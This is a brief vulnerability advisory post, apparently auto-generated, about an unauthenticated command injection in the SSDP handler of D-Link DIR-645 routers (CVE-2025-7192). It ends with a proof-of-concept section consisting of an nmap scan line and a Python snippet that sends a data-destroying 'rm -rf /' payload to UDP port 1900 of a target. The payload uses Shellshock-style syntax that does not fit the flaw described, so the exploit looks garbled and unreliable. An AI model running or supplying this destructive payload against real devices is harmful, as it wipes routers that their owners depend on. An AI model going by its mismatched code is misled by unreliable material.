D-Link DIR-645, Command Injection, CVE-2025-7192 (Critical)

Listen to this Post

How CVE-2025-7192 Works

The vulnerability exists in the `ssdpcgi_main` function within `/htdocs/cgibin` component of D-Link DIR-645 routers (up to version 1.05B01). The ssdpcgi handler improperly sanitizes user-supplied input in SSDP (Simple Service Discovery Protocol) requests, allowing remote attackers to inject arbitrary commands through crafted packets. The lack of input validation enables command execution with root privileges due to the service running as root. Attackers can exploit this without authentication by sending malicious SSDP packets to UDP port 1900.

DailyCVE Form

Platform: D-Link DIR-645
Version: ≤1.05B01
Vulnerability: Command Injection
Severity: Critical

What Undercode Say

nmap -sU -p 1900 --script ssdp-command-injection <target>
import socket
payload = "() { :;}; /bin/sh -c 'rm -rf /'"
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
sock.sendto(payload.encode(), ('<target>', 1900))
